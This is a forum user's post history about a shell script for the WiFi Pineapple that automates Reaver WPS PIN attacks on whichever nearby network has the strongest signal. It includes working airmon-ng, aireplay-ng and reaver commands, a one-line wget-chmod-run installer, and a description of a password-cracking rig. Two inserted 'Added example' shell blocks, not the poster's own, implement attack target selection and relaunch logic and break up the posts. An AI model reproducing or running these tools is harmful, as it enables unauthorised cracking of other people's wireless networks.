
airman_dopey

Active Members
  • Posts: 158
  • Joined
  • Last visited
  • Days Won: 2

Everything posted by airman_dopey

  1. Updated to version 1.1. Change log is as follows:
     - Fixed bug where installing to USB would fail
     - Added Aireplay-ng and Reaver monitoring. This allows the script to ensure everything is running properly and, if either program fails, causes the script to relaunch the suspect program up to the threshold set in the beginning of the script (currently set to 3)
     - Added signal checking to discard network if signal strength is below -81 as shown by Wash
     - Added flag to bypass minimum signal strength check
     - Added output flag to send a copy of all output to file
     - Added ability to have second press of WPS button close script gracefully (This function requires the WPS button script to be rewritten by running the install portion of the script)
     - Added steadily blinking light to signify script is waiting "N" seconds prior to starting attack
     - Added sanity checks to verify Reaver and Aireplay-ng are installed prior to running
     - Fixed numerous bugs relating to the overall function of the script

     If you are upgrading from an older version, please make sure you run the install again and overwrite the WPS button script to add the button-cancel function of the script. Thank you to all who have tried this script. I hope it is useful.
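Added example (not the poster's script): the two behaviours the 1.1 change log describes for Reaver and Aireplay-ng, a relaunch-on-failure loop capped at a threshold of 3, and a pre-flight check that the tools are installed. The "flaky tool" it supervises is a constructed stub that fails a set number of times before succeeding, so the loop can be exercised on a machine without Reaver; the function names and the RELAUNCHES variable are this example's own.

```shell
#!/bin/sh
# Added example, not code from the post. Relaunch-on-failure supervision with a
# threshold (3 in the change log) plus an installed-tool sanity check.

MAX_RELAUNCH=3

# Constructed stand-in for a tool that keeps dying: it fails until the counter
# stored in the file $1 exceeds $2, then exits 0. Only for demonstration.
flaky_tool() {
    counter="$1"; fail_times="$2"
    n=$(cat "$counter" 2>/dev/null || echo 0)
    n=$((n + 1))
    printf '%s\n' "$n" > "$counter"
    [ "$n" -gt "$fail_times" ]
}

# require_tools NAME... : exit 1 (after naming the missing ones) if any tool
# is not on PATH. This is the pre-run sanity check from the change log.
require_tools() {
    missing=0
    for tool in "$@"; do
        command -v "$tool" >/dev/null 2>&1 || { echo "$tool not found" >&2; missing=1; }
    done
    return "$missing"
}

# supervise NAME CMD [ARGS...] : run CMD; on a non-zero exit relaunch it, up
# to MAX_RELAUNCH times. Returns 0 once the command succeeds, 1 when the
# threshold is exhausted. RELAUNCHES records how many relaunches were used.
supervise() {
    name="$1"; shift
    RELAUNCHES=0
    while :; do
        if "$@"; then
            return 0
        fi
        if [ "$RELAUNCHES" -ge "$MAX_RELAUNCH" ]; then
            echo "$name: still failing after $RELAUNCHES relaunches, giving up" >&2
            return 1
        fi
        RELAUNCHES=$((RELAUNCHES + 1))
        echo "$name: exited with an error, relaunch $RELAUNCHES of $MAX_RELAUNCH" >&2
    done
}

# Demo: a tool that fails twice is recovered; one that fails five times is not.
demo_counter=$(mktemp)
if supervise demo-tool flaky_tool "$demo_counter" 2; then
    echo "demo-tool recovered after $RELAUNCHES relaunches"
fi
rm -f "$demo_counter"
```

In the real script the command under supervision would be the aireplay-ng or reaver invocation, and require_tools would be called with reaver and aireplay-ng before phase 1 starts.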
  2. As told in the Wifi Pineapple book found here: https://www.dropbox.com/s/dr6sedfteu8atwq/hak5-mk4-book1e.pdf while in Backtrack (or Kali), type wget http://wifipineapple.com/mk4/scripts/wp4.sh to download the ICS script, run chmod +x wp4.sh to make it executable, then run it as root.
  3. A friend of mine bought the Anker3 and powers the pineapple, powered hub with a USB drive and Alfa NHA card, and a RasPI, and gets approx. 13 hours running off that setup. So yeah, it'll power the USB drive
  4. EDIT 2: Version 1.2 of the script has been released. See post 16 for changes.
     EDIT: Version 1.1 of the script has been released. See 3rd post for changes.

     Hope this is the right section. Hey guys. I was researching Reaver attacks straight from the pineapple and I could not find anything I liked. I wanted something completely automated from the WPS button. Since I couldn't find one I wrote one and thought I'd share.

     This script attempts a WPS attack utilizing Reaver and the wifi pineapple

     Usage: ./reaver.sh [-b BSSID] [-d] [-e ESSID] [-f] [-h] [-i location] [-w time] [-o file] [-s]
       -b BSSID   When scanning for networks this BSSID will be attacked regardless of both signal strength and if it was cracked before. (Note: When scanning networks if both ESSID and BSSID are listed the BSSID is used first)
       -d         Debug mode: Prints extra information to help with debugging
       -e ESSID   When scanning for networks this ESSID will be attacked regardless of both signal strength and if it was cracked before. (Note: When scanning networks if both ESSID and BSSID are listed the BSSID is used first)
       -f         Force attack of closest network (override check of previously cracked networks)
       -h         This screen
       -i         Installs Reaver (if missing) and offers to integrate with WPS button. (Requires internet connection)
       -o file    Sends copy of all output to file
       -s         Overrides the minimum signal strength required
       -w delay   Wait "N" seconds before beginning attack

     (The help screen of the script)

     Basically here's how the script runs: Once you push the WPS button, it will start with phase 1 and blink the light once. During this phase karma will be stopped and the wireless card will be prepped for the attack. Once this is complete the WPS light will blink twice and phase 2 will start. This is where the pineapple will start scanning for networks using wash. First thing that happens is it checks the self-created "cracked.txt" for previously cracked networks and omits them from the scan (unless the -f argument is used). It then checks all the networks seen and, if an ESSID or BSSID was requested, it will use that network if visible. If not seen it will attack the network with the strongest signal. Once the network is determined it will switch to phase 3 and the WPS light will blink 3 times. This is where the actual attack starts. Aireplay-ng will attempt to associate with the network and, if successful, Reaver will begin. Once Reaver completes the WPS light will light back up and the network will be saved in the cracked.txt file. If any errors happen throughout the script it will stall out and the WPS light will start flashing off and on. I have really tried to capture all possible errors, but since I cannot foresee all problems, if you run into any problems please let me know and I will modify my script.

     Installation is extremely simple. Just SSH into your pineapple, and while in the "/root" directory (which is the default directory when you SSH in) run ONE of the following commands to install the script:

     To install Reaver:
     wget http://hax0rbl0x.googlecode.com/files/reaver.sh; chmod +x reaver.sh; ./reaver.sh -i

     Once that is installed, follow the post-installation instructions, or if you selected to modify the WPS button functionality, simply press the WPS button. I have tested this using just the Pineapple holiday bundle and it works like a charm. Not only that, but simply using the pineapple juice for power the pineapple was still going 14 hours later. I guess karma really eats up the battery. So just the pineapple juice should be sufficient for any attacks you are trying to accomplish. If for some reason you run out of juice prior to Reaver finishing the attack it will pick up where it left off. Hope you guys like it. Enjoy.
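Added example (not the poster's script): the phase 2 target selection described in the post, written as a shell function that runs over a constructed wash table so it works offline. It applies the rules stated above, skipping BSSIDs found in cracked.txt unless forced, honouring a requested BSSID before a requested ESSID, otherwise taking the strongest signal, and it also applies the -81 minimum signal from the 1.1 change log unless overridden. The column layout is the wash output quoted in post 6; skipping rows whose WPS Locked column says Yes is an assumption of this example, as are the sample APs and the function name.

```shell
#!/bin/sh
# Added example, not code from the post. Picks the BSSID the script would
# attack from wash output, using the rules the post describes.

MIN_RSSI=-81   # threshold from the 1.1 change log

# Constructed sample wash output; none of these are real APs.
WASH_SAMPLE='BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
00:11:22:33:44:55  11       -52   1.0          No          HomeNet
00:11:22:33:44:66  6        -40   1.0          No          Coffee
00:11:22:33:44:77  1        -85   1.0          No          FarAway
00:11:22:33:44:88  3        -45   1.0          Yes         LockedAP'

# Constructed cracked.txt contents: one BSSID per line.
CRACKED_SAMPLE='00:11:22:33:44:66'

# pick_target WASH CRACKED [want_bssid] [want_essid] [force] [ignore_signal]
# Prints the chosen BSSID, or nothing if no candidate survives the filters.
# force=1 mirrors -f (ignore cracked.txt); ignore_signal=1 mirrors -s.
pick_target() {
    wash="$1"; cracked="$2"; want_bssid="$3"; want_essid="$4"
    force="${5:-0}"; ignore_signal="${6:-0}"
    cracked_flat=$(printf '%s\n' "$cracked" | tr '\n' ' ')

    printf '%s\n' "$wash" | awk -v cracked="$cracked_flat" -v wb="$want_bssid" \
        -v we="$want_essid" -v force="$force" -v nosig="$ignore_signal" \
        -v min="$MIN_RSSI" '
    BEGIN {
        n = split(cracked, c)            # whitespace-separated cracked BSSIDs
        for (i = 1; i <= n; i++) if (c[i] != "") done[c[i]] = 1
        best = ""; best_rssi = -1000
    }
    # Data rows start with a MAC address; this skips the header and ---- line.
    $1 !~ /^[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:/ { next }
    {
        bssid = $1; rssi = $3 + 0; locked = $5
        essid = $6; for (i = 7; i <= NF; i++) essid = essid " " $i   # ESSIDs may contain spaces
        if (locked == "Yes") next        # assumption: a locked AP is not worth attacking
        seen[bssid] = 1; by_essid[essid] = bssid
        if (!force && (bssid in done)) next      # already in cracked.txt
        if (!nosig && rssi < min) next           # too weak to bother
        if (rssi > best_rssi) { best = bssid; best_rssi = rssi }
    }
    END {
        # Requested BSSID wins over requested ESSID; both bypass the other checks.
        if (wb != "" && (wb in seen)) print wb
        else if (we != "" && (we in by_essid)) print by_essid[we]
        else if (best != "") print best
    }'
}

# Demo: with the samples above, Coffee is in cracked.txt, FarAway is below
# -81 and LockedAP is locked, so HomeNet is chosen.
pick_target "$WASH_SAMPLE" "$CRACKED_SAMPLE"
```

The BSSID this prints is what phase 3 would hand to aireplay-ng -1 and reaver -b, as in the commands quoted later in this thread; an empty result is the "no target" case the script should treat as an error rather than fall through to the attack.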
  5. Same issue. Also does not work when using the pineapple juice (which really frustrated me). I feel for you. Very frustrating when you purchasing things from a store expecting them to work with one another and no mention through the store that they do not. The hakshop still doesn't say anything about this issue and it has been reported numerous times in the forums. The lack of communication (or lack of caring, but I am attempting to give the benefit of the doubt) is atrocious.
  6. Output of wash is as follows:

     BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
     --------------------------------------------------------------------
     XX:XX:XX:XX:XX:XX  11       -52   1.0          No          XXXX

     This is while sitting in the same room as the AP using the Alfa panel 7db antenna. So I may have made a small error. When I tried to run aireplay to generate traffic it kept erroring out with a WPA error. But it seems to be case sensitive. When I did my ESSID exactly as listed it was showing as connected. When I tried running reaver in a separate terminal it started cracking. I will edit this post after a successful test with all the commands I used in order, but it seems to be working now. Thank you for all your help.
  7. And you're using the built-in wireless or a separate card?
  8. Just out of curiosity, did anyone require changing the /etc/config/wireless file prior to making reaver work?
  9. Thank you for your response. I tried following your commands and get the same thing. When I leave wlan0 up the "failed to associate" messages appear approx. once every 10-12 seconds. With wlan0 down and only mon0 up the failed messages spam every second. With that being said, wash properly displays the APs in my area. I think I am going to attempt to reflash my pineapple and start over and see if that makes a difference. *EDIT* Reflashed, did an opkg update, opkg install reaver, and then ran the commands listed above, same thing. Tried bringing wlan0 back up, no change (other than the time between error messages again). *EDIT 2* Tried on a separate AP and same result.
  10. Has anyone else worked out the "failed to associate" issue with Reaver? I have tried the following: Firmware at 2.8.1 stable. Installed the reaver 0.4 module.

     ~In Module~
     Stopped wlan0, started wlan0, started mon0, scanned for APs, selected my AP (WPS enabled, good signal), selected auto detect and set channel choices, started attack. At this point I get the failed to associate message. So I switched to the CLI via SSH.

     ~CLI~
     ifconfig wlan0 down
     airmon-ng start wlan0
     ifconfig wlan0 up
     ifconfig mon0 down
     ifconfig mon0 up
     reaver -i mon0 -b XX:XX:XX:XX:XX:XX -a -c 11 -vv

     and I get failed to associate. So I tried using aireplay-ng:

     ~CLI~
     aireplay -1 5 (or 120) -a XX:XX:XX:XX:XX:XX -e ESSID mon0

     comes back with "could not determine channel". Tried setting the channel by dropping wlan0 and changing it using "iw wlan0 set channel 11" and still nothing. Tried doing the same for mon0 but regardless of the interface being up or down the interface states that it is busy when I try to change the channel of mon0. At this point I am completely out of ideas. Any ideas?

     *edit* I have also tried using the exact same reaver command on my Kali build running side by side and the reaver attack through Kali works fine. So I know my AP is not immune to the attack.
  11. Version 1.3 updated, now with Arpspoofing via Ettercap built in. No more need for another script to make it work.
  12. Seeing as this would be used for strictly malicious purposes expect a warning at the very least from the mods. This is a security integrity community, not a group of petty vandals.
  13. Also interested in those scripts if you'd be willing
  14. Open terrain? City? Through buildings? omni or uni directional? There is no "best antenna" and I doubt you're going to get your 3-4 mile range unless you have a very specific scenario in mind.
  15. So are you still intending to release the code for this by chance? I am eager to see how you did the interfacing. Thought about doing this for some tools I'm writing and remembered your post.
  16. ...with the pineapple plugged into AC to prevent power issues.
  17. Thought I would post my gear as well.
     - Laptop is an Acer Aspire, nothing fancy, but it has an Atheros chipset for wireless
     - Pineapple with the travel pack (pineapple juice and case)
     - A couple of 5db rubber duckie antennas
     - A 7db Alfa panel antenna
     - 9db antenna found in the HakShop
     - 14.3db yagi cantenna with the vanguard tripod
     - LAN wiretap
     - Alfa 036H NIC
     - Squid hub and misc. dongles/hubs/flash drives etc.

     Something else I cannot easily take pictures of (but can screenshot) is my server that's on 24/7. I host files through it to the house and thought about making it a "cracking rig". So I threw an old GTX285 in it and beefed up the power supply. With that I added GPU cracking to it and wrote some scripts to automate my dictionary/brute force attacks. A simple script on my laptop allows me to check the pcap file and sftp it to my home rig (using dynamic DNS). Once the file transfers to my server I SSH in and load the main menu script. You can see some of the things I have added already. This is the configuration menu where I can pick which wordlists to use. I have over 33 gigs of wordlists stored on the machine. Additionally, I can spawn the processes into the background and let them run by themselves. For notifications I have my rig programmed to text me with status messages (wordlist started, finished, password found/not found). This way I can be in the field and, once capturing a handshake, forward it on to my rig and go eat some lunch or something while my machine back home does all the heavy lifting. Once the machine finds the info, I receive a text on my phone that looks like this: It's not pretty ATM, but it is extremely functional. I'm looking to add hash cracking and similar tools to it. No point in using my feeble laptop for cracking when I can let full blown desktops do it much much faster.
  18. Try to ssh into the pineapple and cat the file
  19. One hopes that this would be your ip address (although I would not post mine on a "hacking" website) because it would be really shitty if you were advertising a stranger's ip with hardware listed.
  20. This doesn't pass my sniff test....
  21. Link 1: Yes, a higher gain antenna will give you further range, but keep in mind that an omni directional antenna has a donut-shaped range. The higher the gain, the flatter the donut (to the point that even a couple feet higher than the antenna will cause you to have no signal). I am not a radio professional, so I cannot say how the 12db antenna will perform, but I have a 9db one from the hakshop and it works very well. As for the second link, yes, that is the one
  22. I'm assuming killall does not return an error but just fails to kill it? Have you tried a kill -9?
  23. When people won't search through the thread they're in they sure as hell won't search an entire forum. http://forums.hak5.org/index.php?/topic/28275-cannot-upgrade-md5sum-does-not-match/
  24. Ngrep was pulled from the pineapple due to a lack of power. We want tools that allow the pineapple to do what it does best and leave the heavy lifting to a Pi or another computer. Besides, I'd rather be able to do as little or as much as I want for any given attack; not be limited by the hardware.
  25. Most (if not all) of the vulnerabilities discovered and released would have been patched. I think (though correct me if I'm wrong) you want another vulnerability discovered and recorded for your site.